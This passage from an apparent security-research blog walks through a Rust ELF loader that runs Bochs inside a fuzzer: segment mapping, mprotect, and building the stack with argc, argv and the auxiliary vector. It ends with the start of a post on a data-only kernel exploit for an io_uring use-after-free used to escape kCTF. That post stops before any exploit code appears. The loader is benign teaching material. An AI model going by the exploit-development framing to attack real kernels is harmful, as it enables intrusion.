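        .unwrap_or(0);

    // Round up to the next page boundary
    (end + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}
```

For the test binary, the last segment ends at 0xc7de0 + 0x6a80 = 0xce860, so the mapping comes out to 0xcf000 bytes.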

We iterate through all of the Program Headers in the parsed ELF, and we just see where the largest “end_addr” is. This accounts for the page-aligning padding in between segments as well. And as you can see, we also page-align the last segment as well by making sure that the size is rounded up to the nearest page. At this point we know how much memory we need to mmap to hold the loadable ELF segments. We mmap a contiguous range of memory here:

// Call `mmap` to map memory into our process to hold all of the loadable 
// program header contents in a contiguous range. Right now the perms will be
// generic across the entire range as PROT_WRITE,
// later we'll go back and `mprotect` them appropriately
fn initial_mmap(size: usize) -> Result<usize, LucidErr> {
    // Pass LOAD_TARGET only as a hint, without MAP_FIXED the kernel is free
    // to place the mapping somewhere else
    let addr = LOAD_TARGET as *mut libc::c_void;

    // Length is straight forward
    let length = size as libc::size_t;

    // Set the protections for now to writable
    let prot = libc::PROT_WRITE;

    // Set the flags, this is anonymous memory
    let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

    // We don't have a file to map, so this is -1
    let fd = -1 as libc::c_int;

    // We don't specify an offset 
    let offset = 0 as libc::off_t;

    // Call `mmap` and make sure it succeeds
    let result = unsafe {
        libc::mmap(
            addr,
            length,
            prot,
            flags,
            fd,
            offset
        )
    };

    if result == libc::MAP_FAILED {
        return Err(LucidErr::from("Failed to `mmap` memory for Bochs"));
    }

    Ok(result as usize)
}

So now we have carved out enough memory to write the loadable segments to. The segment data is sourced from the file of course, and so the first thing we do is once again iterate through the Program Headers and extract all the relevant data we need to do a memcpy from the file data in memory, to the carved out memory we just created. You can see that logic here:

let mut load_segments = Vec::new();
    for ph in elf.program_headers.iter() {
        if ph.is_load() {
            load_segments.push((
                ph.flags,               // segment.0
                ph.vaddr    as usize,   // segment.1
                ph.memsz    as usize,   // segment.2
                ph.offset   as usize,   // segment.3
                ph.filesz   as usize,   // segment.4
            ));
        }
    }
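
One detail worth spelling out about that tuple: filesz can be smaller than memsz (the RW segment in our readelf output has 0x5350 bytes in the file but needs 0x6a80 in memory). The difference is zero-initialized data like .bss, which we get for free because anonymous mmap memory starts out zeroed. Here is a safe sketch of the copy step that uses a byte slice in place of the real mapping. The `Segment` struct and `load_into` are hypothetical names, and the sketch zeroes the tail explicitly since a plain slice makes no such promise.

```rust
/// Hypothetical named version of the tuple fields the copy needs
pub struct Segment {
    pub vaddr: usize,
    pub memsz: usize,
    pub offset: usize,
    pub filesz: usize,
}

/// Copy one segment from `file` into `image` (standing in for the mmap'd
/// range). Only `filesz` bytes come from the file, the rest is zeroed.
pub fn load_into(
    image: &mut [u8],
    file: &[u8],
    seg: &Segment,
) -> Result<(), String> {
    if seg.filesz > seg.memsz {
        return Err("filesz is larger than memsz".to_string());
    }

    // Source bytes: file[offset .. offset + filesz]
    let src_end = seg.offset.checked_add(seg.filesz)
        .ok_or("segment file range overflows")?;
    let src = file.get(seg.offset..src_end)
        .ok_or("segment data lies outside the file")?;

    // Destination bytes: image[vaddr .. vaddr + memsz]
    let dst_end = seg.vaddr.checked_add(seg.memsz)
        .ok_or("segment memory range overflows")?;
    let dst = image.get_mut(seg.vaddr..dst_end)
        .ok_or("segment lies outside the mapping")?;

    // File-backed part first, then the zero-filled tail
    dst[..seg.filesz].copy_from_slice(src);
    dst[seg.filesz..].fill(0);

    Ok(())
}
```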

After the segment metadata has been extracted, we can copy the contents over as well as call mprotect on the segment in memory so that its permissions perfectly match the Flags segment metadata we discussed earlier. That logic is here:

// Iterate through the loadable segments and change their perms and then 
// copy the data over
for segment in load_segments.iter() {
    // Copy the binary data over, the destination is where in our process
    // memory we're copying the binary data to. The source is where we copy
    // from, this is going to be an offset into the binary data in the file,
    // len is going to be how much binary data is in the file, that's filesz 
    // This is going to be unsafe no matter what
    let len = segment.4;
    let dst = (addr + segment.1) as *mut u8;
    let src = (elf.data[segment.3..segment.3 + len]).as_ptr();

    unsafe {
        std::ptr::copy_nonoverlapping(src, dst, len);
    }

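    // Calculate the `mprotect` address by adding the mmap address plus the
    // virtual address offset, we also mask off the low 12 bits so
    // that we are always page-aligned as required by `mprotect`
    let segment_addr = addr + segment.1;
    let mprotect_addr = (segment_addr & !(PAGE_SIZE - 1))
        as *mut libc::c_void;

    // Get the length, including the bytes we gained by rounding the address
    // down, so that the range still reaches the end of the segment
    let mprotect_len = (segment.2 + (segment_addr & (PAGE_SIZE - 1)))
        as libc::size_t;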

    // Get the protection
    let mut mprotect_prot = 0 as libc::c_int;
    if segment.0 & 0x1 == 0x1 { mprotect_prot |= libc::PROT_EXEC; }
    if segment.0 & 0x2 == 0x2 { mprotect_prot |= libc::PROT_WRITE; }
    if segment.0 & 0x4 == 0x4 { mprotect_prot |= libc::PROT_READ; }

    // Call `mprotect` to change the mapping perms
    let result = unsafe {
        libc::mprotect(
            mprotect_addr,
            mprotect_len,
            mprotect_prot
        )
    };

    if result < 0 {
        return Err(LucidErr::from("Failed to `mprotect` memory for Bochs"));
    }
}
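
One detail in the snippet above that is easy to trip over: the ELF flag bits and the mprotect protection bits use opposite numbering (execute is 0x1 in the program header flags, but PROT_EXEC is 0x4), so they have to be translated rather than passed straight through. Here is a minimal, crate-free sketch of that translation plus the page rounding. The constants are copied from the Linux ABI so the example doesn't need libc, and the helper names elf_flags_to_prot and mprotect_range are made up for illustration, they are not part of Lucid.

```rust
// Linux protection bits, duplicated here so the sketch needs no crates
const PROT_READ: i32 = 0x1;
const PROT_WRITE: i32 = 0x2;
const PROT_EXEC: i32 = 0x4;

// ELF program header flag bits (p_flags)
const PF_X: u32 = 0x1;
const PF_W: u32 = 0x2;
const PF_R: u32 = 0x4;

const PAGE_SIZE: usize = 0x1000;

// Translate ELF segment flags into `mprotect` protection bits
fn elf_flags_to_prot(flags: u32) -> i32 {
    let mut prot = 0;
    if flags & PF_X != 0 { prot |= PROT_EXEC; }
    if flags & PF_W != 0 { prot |= PROT_WRITE; }
    if flags & PF_R != 0 { prot |= PROT_READ; }
    prot
}

// Compute a page-aligned (start, length) pair that covers every byte of a
// segment that lives at `base + vaddr` and spans `memsz` bytes
fn mprotect_range(base: usize, vaddr: usize, memsz: usize) -> (usize, usize) {
    let seg_start = base + vaddr;
    let seg_end = seg_start + memsz;

    // Round the start down and the end up to page boundaries
    let start = seg_start & !(PAGE_SIZE - 1);
    let end = (seg_end + PAGE_SIZE - 1) & !(PAGE_SIZE - 1);

    (start, end - start)
}
```

For a segment at base 0x10000 with a virtual address of 0x1234 and a memsz of 0x2000, mprotect_range returns a start of 0x11000 and a length of 0x3000, which covers the partial pages on both ends.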

After that is successful, our ELF image is basically complete. We can just jump to it and start executing! Just kidding, we have to first set up a stack for the new “process”, which I learned was a huge pain.

Setting Up a Stack for Bochs

I spent a lot of time on this and there actually might still be bugs! This was the hardest part I’d say as everything else was pretty much straightforward. To complete this part, I heavily leaned on this resource which describes how x86 32-bit application stacks are fabricated: https://articles.manugarg.com/aboutelfauxiliaryvectors.

Here is an extremely useful diagram describing the 32-bit stack cribbed from the linked resource above:

position            content                     size (bytes) + comment
  ------------------------------------------------------------------------
  stack pointer ->  [ argc = number of args ]     4
                    [ argv[0] (pointer) ]         4   (program name)
                    [ argv[1] (pointer) ]         4
                    [ argv[..] (pointer) ]        4 * x
                    [ argv[n - 1] (pointer) ]     4
                    [ argv[n] (pointer) ]         4   (= NULL)

                    [ envp[0] (pointer) ]         4
                    [ envp[1] (pointer) ]         4
                    [ envp[..] (pointer) ]        4
                    [ envp[term] (pointer) ]      4   (= NULL)

                    [ auxv[0] (Elf32_auxv_t) ]    8
                    [ auxv[1] (Elf32_auxv_t) ]    8
                    [ auxv[..] (Elf32_auxv_t) ]   8
                    [ auxv[term] (Elf32_auxv_t) ] 8   (= AT_NULL vector)

                    [ padding ]                   0 - 16

                    [ argument ASCIIZ strings ]   >= 0
                    [ environment ASCIIZ str. ]   >= 0

  (0xbffffffc)      [ end marker ]                4   (= NULL)

  (0xc0000000)      < bottom of stack >           0   (virtual)
  ------------------------------------------------------------------------

When we pass arguments to a process on the command line like ls / -laht, the Linux OS has to load the ls ELF into memory and create its environment. In this example, we passed a couple of argument values to the process as well: / and -laht. The way that the OS passes these arguments to the process is on the stack via the argument vector, or argv for short, which is an array of string pointers. The number of arguments is represented by the argument count, or argc. The first member of argv is usually the name of the executable that was passed on the command line, so in our example it would be ls. As you can see, the first thing on the stack (the top of the stack, which is at the lower end of the stack's address range) is argc, followed by all the pointers to string data representing the program arguments. It is also important to note that the array is NULL terminated.

After that, we have a similar data structure with the envp array, which is an array of pointers to string data representing environment variables. You can retrieve this data yourself by running a program under GDB and using the command show environment, the environment variables are usually in the form “KEY=VALUE”, for instance on my machine the key-value pair for the language environment variable is "LANG=en_US.UTF-8". For our purposes, we can ignore the environment variables. This vector is also NULL terminated.

Next is the auxiliary vector, which is extremely important to us. This information details several aspects of the program. On x86-64, the entries in the vector are 16 bytes apiece (the diagram above shows 8 because it describes a 32-bit stack). They comprise a key and a value just like our environment variable entries, but here both are u64 values. For the test program, we can actually dump the auxiliary information by using info aux under GDB.

gef➤  info aux
33   AT_SYSINFO_EHDR      System-supplied DSO's ELF header 0x7ffff7f2e000
51   ???                                                 0xe30
16   AT_HWCAP             Machine-dependent CPU capability hints 0x1f8bfbff
6    AT_PAGESZ            System page size               4096
17   AT_CLKTCK            Frequency of times()           100
3    AT_PHDR              Program headers for program    0x7ffff7f30040
4    AT_PHENT             Size of program header entry   56
5    AT_PHNUM             Number of program headers      12
7    AT_BASE              Base address of interpreter    0x0
8    AT_FLAGS             Flags                          0x0
9    AT_ENTRY             Entry point of program         0x7ffff7f39f50
11   AT_UID               Real user ID                   1000
12   AT_EUID              Effective user ID              1000
13   AT_GID               Real group ID                  1000
14   AT_EGID              Effective group ID             1000
23   AT_SECURE            Boolean, was exec setuid-like? 0
25   AT_RANDOM            Address of 16 random bytes     0x7fffffffe3b9
26   AT_HWCAP2            Extension of AT_HWCAP          0x2
31   AT_EXECFN            File name of executable        0x7fffffffefe2 "/home/dude/lucid/test"
15   AT_PLATFORM          String identifying platform    0x7fffffffe3c9 "x86_64"
0    AT_NULL              End of vector                  0x0

The keys are on the left and the values are on the right. For instance, on the stack we can expect the key 0x5 for AT_PHNUM, which describes the number of Program Headers, to be accompanied by 12 as the value. We can dump the stack and see this in action as well.

gef➤  x/400gx $rsp
0x7fffffffe0b0:	0x0000000000000001	0x00007fffffffe3d6
0x7fffffffe0c0:	0x0000000000000000	0x00007fffffffe3ec
0x7fffffffe0d0:	0x00007fffffffe3fc	0x00007fffffffe44e
0x7fffffffe0e0:	0x00007fffffffe461	0x00007fffffffe475
0x7fffffffe0f0:	0x00007fffffffe4a2	0x00007fffffffe4b9
0x7fffffffe100:	0x00007fffffffe4e5	0x00007fffffffe505
0x7fffffffe110:	0x00007fffffffe52e	0x00007fffffffe542
0x7fffffffe120:	0x00007fffffffe559	0x00007fffffffe56c
0x7fffffffe130:	0x00007fffffffe588	0x00007fffffffe59d
0x7fffffffe140:	0x00007fffffffe5b8	0x00007fffffffe5c5
0x7fffffffe150:	0x00007fffffffe5da	0x00007fffffffe60e
0x7fffffffe160:	0x00007fffffffe61d	0x00007fffffffe646
0x7fffffffe170:	0x00007fffffffe667	0x00007fffffffe674
0x7fffffffe180:	0x00007fffffffe67d	0x00007fffffffe68d
0x7fffffffe190:	0x00007fffffffe69b	0x00007fffffffe6ad
0x7fffffffe1a0:	0x00007fffffffe6be	0x00007fffffffeca0
0x7fffffffe1b0:	0x00007fffffffecc1	0x00007fffffffeccd
0x7fffffffe1c0:	0x00007fffffffecde	0x00007fffffffed34
0x7fffffffe1d0:	0x00007fffffffed63	0x00007fffffffed73
0x7fffffffe1e0:	0x00007fffffffed8b	0x00007fffffffedad
0x7fffffffe1f0:	0x00007fffffffedc4	0x00007fffffffedd8
0x7fffffffe200:	0x00007fffffffedf8	0x00007fffffffee02
0x7fffffffe210:	0x00007fffffffee21	0x00007fffffffee2c
0x7fffffffe220:	0x00007fffffffee34	0x00007fffffffee46
0x7fffffffe230:	0x00007fffffffee65	0x00007fffffffee7c
0x7fffffffe240:	0x00007fffffffeed1	0x00007fffffffef7b
0x7fffffffe250:	0x00007fffffffef8d	0x00007fffffffefc3
0x7fffffffe260:	0x0000000000000000	0x0000000000000021
0x7fffffffe270:	0x00007ffff7f2e000	0x0000000000000033
0x7fffffffe280:	0x0000000000000e30	0x0000000000000010
0x7fffffffe290:	0x000000001f8bfbff	0x0000000000000006
0x7fffffffe2a0:	0x0000000000001000	0x0000000000000011
0x7fffffffe2b0:	0x0000000000000064	0x0000000000000003
0x7fffffffe2c0:	0x00007ffff7f30040	0x0000000000000004
0x7fffffffe2d0:	0x0000000000000038	0x0000000000000005
0x7fffffffe2e0:	0x000000000000000c	0x0000000000000007

Towards the end of the data, at 0x7fffffffe2d8, we can see the key 0x5, and at 0x7fffffffe2e0 we can see the value 0xc, which is 12 in decimal. We need some of these in order to load our ELF properly as the ELF _start routine requires some of them in order to set the environment up properly. The ones I included on my stack were the following, though they might not all be necessary:

AT_ENTRY which holds the program entry point,
AT_PHDR which is a pointer to the program header data,
AT_PHNUM which is the number of program headers,
AT_RANDOM which is a pointer to 16 bytes of random data, which is supposed to be placed by the kernel. This 16-byte value serves as an RNG seed to construct stack canary values. I found out that the program we load actually does need this information because I ended up with a NULL-ptr deref during my initial testing, and when I then placed this auxv pair with a value of 0x4141414141414141, I ended up crashing trying to access that address. For our purposes, we don’t really care that the stack canary values are cryptographically secure, so I just placed another pointer to the program entry as that is guaranteed to exist.
AT_NULL which is used to terminate the auxiliary vector

So with those values all accounted for, we now know all of the data we need to construct the program’s stack.
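
To make the key/value layout concrete, here is a small sketch that walks an auxiliary vector the same way the loaded program's startup code conceptually does: read pairs of u64 values until the AT_NULL key shows up. The words in SAMPLE_AUXV are copied from the stack dump above starting at 0x7fffffffe268; the dump is cut off before the end of the vector, so the final AT_NULL pair was appended by me. The function names parse_auxv and lookup are just for illustration.

```rust
// Keys from the Linux auxiliary vector ABI
const AT_NULL: u64 = 0;
const AT_PHDR: u64 = 3;
const AT_PHNUM: u64 = 5;
const AT_RANDOM: u64 = 25;

// Words copied from the stack dump above, plus an AT_NULL terminator that was
// added for the example because the dump is truncated
const SAMPLE_AUXV: [u64; 18] = [
    0x21, 0x0000_7fff_f7f2_e000, // AT_SYSINFO_EHDR
    0x33, 0xe30,                 // key 51, printed as ??? by GDB
    0x10, 0x1f8b_fbff,           // AT_HWCAP
    0x06, 0x1000,                // AT_PAGESZ
    0x11, 0x64,                  // AT_CLKTCK
    0x03, 0x0000_7fff_f7f3_0040, // AT_PHDR
    0x04, 0x38,                  // AT_PHENT
    0x05, 0x0c,                  // AT_PHNUM
    0x00, 0x00,                  // AT_NULL (added)
];

// Walk (key, value) pairs until the AT_NULL key terminates the vector
fn parse_auxv(words: &[u64]) -> Vec<(u64, u64)> {
    let mut entries = Vec::new();
    for pair in words.chunks_exact(2) {
        if pair[0] == AT_NULL {
            break;
        }
        entries.push((pair[0], pair[1]));
    }
    entries
}

// Find the value for a given key, if the key is present
fn lookup(entries: &[(u64, u64)], key: u64) -> Option<u64> {
    entries.iter().find(|(k, _)| *k == key).map(|(_, v)| *v)
}
```

Looking up AT_PHNUM in the parsed sample gives 12, matching the info aux output, while AT_RANDOM is absent from this truncated sample and comes back as None.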

Allocating the Stack

First, we need to allocate memory to hold the Bochs stack since we will need to know the address it’s mapped at in order to formulate our pointers. We will know offsets within a vector representing the stack data, but we won’t know what the absolute addresses are unless we know ahead of time where this stack is going in memory. Allocating the stack was very straightforward as I just used mmap the same way we did with the program segments. Right now I’m using a 1MB stack which seems to be large enough.

Constructing the Stack Data

In my stack creation logic, I created the stack starting from the bottom and then inserted values on top of the stack.

So the first value we place onto the stack is the “end-marker” from the diagram which is just a 0u64 in Rust.

Next, we need to place all of the strings we need onto the stack, namely our command line arguments. To separate command line arguments meant for the fuzzer from command line arguments meant for Bochs, I created a command line argument --bochs-args which is meant to serve as a delineation point between the two argument categories. Every argument after --bochs-args is meant for Bochs. I iterate through all of the command line arguments provided and then place them onto the stack. I also log the length of each string argument so that later on, we can calculate their absolute address for when we need to place pointers to the strings in the argv vector. As a sidenote, I also made sure that we maintained 8-byte alignment throughout the string pushing routine just so we didn’t have to deal with any weird pointer values. This isn’t necessary but makes the stack state easier for me to reason about. This is performed with the following logic:

// Create a vector to hold all of our stack data
let mut stack_data = Vec::new();

// Add the "end-marker" NULL, we're skipping adding any envvar strings for
// now
push_u64(&mut stack_data, 0u64);

// Parse the argv entries for Bochs
let args = parse_bochs_args();

// Store the length of the strings including padding
let mut arg_lens = Vec::new();

// For each argument, push a string onto the stack and store its offset 
// location
for arg in args.iter() {
    let old_len = stack_data.len();
    push_string(&mut stack_data, arg.to_string());

    // Calculate arg length and store it
    let arg_len = stack_data.len() - old_len;
    arg_lens.push(arg_len);
}
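
The parse_bochs_args function isn't shown in this post, so here is a hedged sketch of how the --bochs-args split could work. It is a guess at the idea rather than Lucid's actual implementation: the function name split_args is hypothetical, and it takes any iterator of strings so that it can be exercised without touching the real process arguments.

```rust
const BOCHS_ARGS_FLAG: &str = "--bochs-args";

// Split a command line into (fuzzer args, Bochs args). Everything after the
// first `--bochs-args` belongs to Bochs, the flag itself is dropped
fn split_args<I>(args: I) -> (Vec<String>, Vec<String>)
where
    I: IntoIterator<Item = String>,
{
    let mut fuzzer_args = Vec::new();
    let mut bochs_args = Vec::new();
    let mut seen_flag = false;

    for arg in args {
        // The first occurrence of the flag flips us into "Bochs mode"
        if !seen_flag && arg == BOCHS_ARGS_FLAG {
            seen_flag = true;
            continue;
        }

        if seen_flag {
            bochs_args.push(arg);
        } else {
            fuzzer_args.push(arg);
        }
    }

    (fuzzer_args, bochs_args)
}
```

In a real binary you would call it as split_args(std::env::args()). Note that argv[0] for the loaded program still has to come from somewhere; the test output later in the post shows ./bochs in that slot.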

Pushing strings is performed like this:

// Pushes a NULL terminated string onto the "stack" and pads the string with 
// NULL bytes until we achieve 8-byte alignment
fn push_string(stack: &mut Vec<u8>, string: String) {
    // Convert the string to bytes and append it to the stack
    let mut bytes = string.as_bytes().to_vec();

    // Add a NULL terminator
    bytes.push(0x0);

    // We're adding bytes in reverse because we're adding to index 0 always,
    // we want to pad these strings so that they remain 8-byte aligned so that
    // the stack is easier to reason about imo
    if bytes.len() % U64_SIZE > 0 {
        let pad = U64_SIZE - (bytes.len() % U64_SIZE);
        for _ in 0..pad { bytes.push(0x0); }
    }

    for &byte in bytes.iter().rev() {
        stack.insert(0, byte);
    }
}

Then we add some padding and the auxiliary vector members:

// Add some padding
push_u64(&mut stack_data, 0u64);

// Next we need to set up the auxiliary vectors, terminate the vector with
// the AT_NULL key which is 0, with a value of 0
push_u64(&mut stack_data, 0u64);
push_u64(&mut stack_data, 0u64);

// Add the AT_ENTRY key which is 9, along with the value from the Elf header
// for the program's entry point. We need to calculate the absolute address
// by adding the base the image was loaded at
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 9u64);

// Add the AT_PHDR key which is 3, along with the address of the program
// headers which is just ELF_HDR_SIZE away from the base
push_u64(&mut stack_data, (base + ELF_HDR_SIZE) as u64);
push_u64(&mut stack_data, 3u64);

// Add the AT_PHNUM key which is 5, along with the number of program headers
push_u64(&mut stack_data, elf.program_headers.len() as u64);
push_u64(&mut stack_data, 5u64);

// Add AT_RANDOM key which is 25, this is where the start routines will 
// expect 16 bytes of random data as a seed to generate stack canaries, we
// can just use the entry again since we don't care about security
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 25u64);

Then, since we ignored the environment variables, we just push a NULL pointer onto the stack and also the NULL pointer terminating the argv vector:

// Since we skipped envvars for now, envp[0] is going to be NULL
push_u64(&mut stack_data, 0u64);

// argv[n] is a NULL
push_u64(&mut stack_data, 0u64);

This is where I spent a lot of time debugging. We now have to add the pointers to our arguments. To do this, I first calculated the total length of the stack data now that we know all of the variable parts like the number of arguments and the length of all the strings. We have the stack length as it currently exists which includes the strings, and we know how many pointers and members we have left to add to the stack (number of args and argc). Since we know this, we can calculate the absolute addresses of where the string data will be as we push the argv pointers onto the stack. We calculate the length as follows:

// At this point, we have all the information we need to calculate the total
// length of the stack. We're missing the argv pointers and finally argc
let mut stack_length = stack_data.len();

// Add argv pointers
stack_length += args.len() * POINTER_SIZE;

// Add argc
stack_length += std::mem::size_of::<u64>();

Next, we start at the bottom of the stack and create a movable offset which will track through the stack stopping at the beginning of each string so that we can calculate its absolute address. The offset represents how deep into the stack from the top we are. At first, the offset is the largest value it can be because it’s at the bottom of the stack (higher-memory address). We subtract from it in order to point us towards the beginning of each argv string we pushed onto the stack. So the bottom of the stack looks something like this:

NULL
string_1
string_2
end-marker <--- offset

So armed with the arguments and their lengths that we recorded, we can adjust the offset each time we iterate through the argument lengths to point to the beginning of the strings. There is one gotcha though, on the first iteration, we have to account for the end-marker and its 8-bytes. So this is how the logic goes:

// Right now our offset is at the bottom of the stack, for the first
// argument calculation, we have to accommodate the "end-marker" that we added
// to the stack at the beginning. So we need to move the offset up the size
// of the end-marker and then the size of the argument itself. After that,
// we only have to accommodate the argument lengths when moving the offset
for (idx, arg_len) in arg_lens.iter().enumerate() {
    // First argument, account for end-marker
    if idx == 0 {
        curr_offset -= arg_len + U64_SIZE;
    }
    
    // Not the first argument, just account for the string length
    else {
        curr_offset -= arg_len;
    }
    
    // Calculate the absolute address
    let absolute_addr = (stack_addr + curr_offset) as u64;

    // Push the absolute address onto the stack
    push_u64(&mut stack_data, absolute_addr);
}

It’s pretty cool! And it seems to work? Finally we cap the stack off with argc and we are done populating all of the stack data in a vector. Next, we’ll want to actually copy the data onto the stack allocation which is straightforward so no code snippet there.
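
Since the offset bookkeeping is where I burned the most time, here is a stripped-down, self-contained sketch of the same idea that you can run and poke at. It only builds the end-marker, the strings, the argv pointers, and argc (no auxv or envp), and it reads the pointers back to prove they land on the right strings. A few things here are assumptions rather than Lucid's real code: push_u64 isn't shown in this post so its body is a guess, stack_addr is taken to be the address where the first byte of the finished stack data will live, and the arguments are walked in reverse so that argv[0] ends up closest to the top.

```rust
const U64_SIZE: usize = 8;

// Assumed behavior of `push_u64`: little-endian bytes inserted at index 0
fn push_u64(stack: &mut Vec<u8>, value: u64) {
    for &byte in value.to_le_bytes().iter().rev() {
        stack.insert(0, byte);
    }
}

// NULL terminate, pad to 8 bytes, insert at index 0
fn push_string(stack: &mut Vec<u8>, string: &str) {
    let mut bytes = string.as_bytes().to_vec();
    bytes.push(0x0);
    while bytes.len() % U64_SIZE != 0 {
        bytes.push(0x0);
    }
    for &byte in bytes.iter().rev() {
        stack.insert(0, byte);
    }
}

fn build_argv_stack(args: &[&str], stack_addr: u64) -> Vec<u8> {
    let mut stack = Vec::new();
    push_u64(&mut stack, 0); // end-marker

    // Push strings last-argument-first and record their padded lengths
    let mut arg_lens = Vec::new();
    for arg in args.iter().rev() {
        let old_len = stack.len();
        push_string(&mut stack, arg);
        arg_lens.push(stack.len() - old_len);
    }

    push_u64(&mut stack, 0); // argv[n] = NULL

    // Final length once the argv pointers and argc are added
    let total = stack.len() + args.len() * U64_SIZE + U64_SIZE;

    // Walk up from the bottom, stopping at the start of each string
    let mut curr_offset = total;
    for (idx, arg_len) in arg_lens.iter().enumerate() {
        curr_offset -= if idx == 0 { arg_len + U64_SIZE } else { *arg_len };
        push_u64(&mut stack, stack_addr + curr_offset as u64);
    }

    push_u64(&mut stack, args.len() as u64); // argc
    stack
}

fn read_u64(stack: &[u8], offset: usize) -> u64 {
    let mut bytes = [0u8; U64_SIZE];
    bytes.copy_from_slice(&stack[offset..offset + U64_SIZE]);
    u64::from_le_bytes(bytes)
}

// Follow the argv pointers back to their strings, like the loaded program
fn read_argv(stack: &[u8], stack_addr: u64) -> Vec<String> {
    let argc = read_u64(stack, 0) as usize;
    let mut args = Vec::new();
    for i in 0..argc {
        let ptr = read_u64(stack, (i + 1) * U64_SIZE);
        let start = (ptr - stack_addr) as usize;
        let len = stack[start..].iter().position(|&b| b == 0).unwrap();
        args.push(String::from_utf8_lossy(&stack[start..start + len]).into_owned());
    }
    args
}
```

Building a stack for ./bochs, -AAAAA, and -BBBBBBBBBB and then calling read_argv on it returns the three strings in their original order, which is a cheap sanity check to run before ever jumping to the target.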

The last piece of information I think worth noting here is that I created a constant called STACK_DATA_MAX and the length of the stack data cannot be more than that tunable value. We use this value to set up RSP when we jump to the program in memory and start executing. RSP is set so that it is at the absolute lowest address possible, which is the stack allocation size - STACK_DATA_MAX. This way, when the stack grows, we have left the maximum amount of slack space possible for the stack to grow into since the stack grows down in memory.

Executing the Loaded Program

Everything at this point should be set up perfectly in memory and all we have to do is jump to the target code and start executing. For now, I haven’t fleshed out a context switching routine or anything; we’re literally just going to jump to the program, execute it, and hope everything goes well. The code I used to achieve this is very simple:

pub fn start_bochs(bochs: Bochs) {
    // Set RAX to our jump destination which is the program entry, clear RDX,
    // and set RSP to the correct value
    unsafe {
        asm!(
            "mov rax, {0}",
            "mov rsp, {1}",
            "xor rdx, rdx",
            "jmp rax",
            in(reg) bochs.entry,
            in(reg) bochs.rsp,
        );
    }
}

The reason we clear RDX is because if the _start routine sees a non-zero value in RDX, it will interpret that to mean that we are attempting to register a hook located at the address in RDX to be invoked when the program exits. We don’t have one we want to run, so for now we NULL it out. The other register values don’t really matter. We move the program entry point into RAX and use it as the target of an indirect jump, and we supply our handcrafted RSP so that the program has a stack to use to do its relocations and run properly.

dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[17:43:19] lucid> Loading Bochs...
[17:43:19] lucid> Bochs loaded { Entry: 0x19F50, RSP: 0x7F513F11C000 }
Argument count: 3
Args:
   -./bochs
   --AAAAA
   --BBBBBBBBBB
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
dude@lol:~/lucid/target/release$ 

The program runs, parses our command line args, and exits all without crashing! So it looks like everything is good to go. This would normally be a good stopping place, but I was morbidly curious…

Will Bochs Run?

We have to see right? First we have to compile Bochs as a -static-pie ELF which was a headache in itself, but I was able to figure it out.

dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[12:30:40] lucid> Loading Bochs...
[12:30:40] lucid> Bochs loaded { Entry: 0xA3DB0, RSP: 0x7FEB0F565000 }
========================================================================
                        Bochs x86 Emulator 2.7
              Built from SVN snapshot on August  1, 2021
                Timestamp: Sun Aug  1 10:07:00 CEST 2021
========================================================================
Usage: bochs [flags] [bochsrc options]

  -n               no configuration file
  -f configfile    specify configuration file
  -q               quick start (skip configuration interface)
  -benchmark N     run Bochs in benchmark mode for N millions of emulated ticks
  -dumpstats N     dump Bochs stats every N millions of emulated ticks
  -r path          restore the Bochs state from path
  -log filename    specify Bochs log file name
  -unlock          unlock Bochs images leftover from previous session
  --help           display this help and exit
  --help features  display available features / devices and exit
  --help cpu       display supported CPU models and exit

For information on Bochs configuration file arguments, see the
bochsrc section in the user documentation or the man page of bochsrc.
00000000000p[      ] >>PANIC<< command line arg '-AAAAA' was not understood
00000000000e[SIM   ] notify called, but no bxevent_callback function is registered
========================================================================
Bochs is exiting with the following message:
[      ] command line arg '-AAAAA' was not understood
========================================================================
00000000000i[SIM   ] quit_sim called with exit code 1

Bochs runs! It couldn’t make sense of our nonsense command line arguments, but we loaded it and ran it successfully.

Next Steps

The very next step and blog post will be developing a context-switching routine that we will use to transition between Fuzzer execution and Bochs execution. This will involve saving our state each time and will function basically the same way a normal user-to-kernel context switch functions.

After that, we have to get very familiar with Bochs and attempt to get a target up and running in vanilla Bochs. Once we do that, we’ll try to run that in the Fuzzer.

Resources

I used this excellent blogpost from Faster Than Lime a lot when learning about how to load ELFs in memory: https://fasterthanli.me/series/making-our-own-executable-packer/part-17.
Also shoutout @netspooky for helping me understand the stack layout!
Thank you to ChatGPT as well, for being my sounding board (even if you failed to help me with my stack creation bugs)

Code

https://github.com/h0mbre/Lucid

Escaping the Google kCTF Container with a Data-Only Exploit

2023-07-29T00:00:00+00:00

Introduction

I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_uring has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up with me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging as it seemed it was worthwhile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge; if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.

The Bug

The bug is extremely simple (why can’t I find one like this?) and was exploited in kCTF in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.

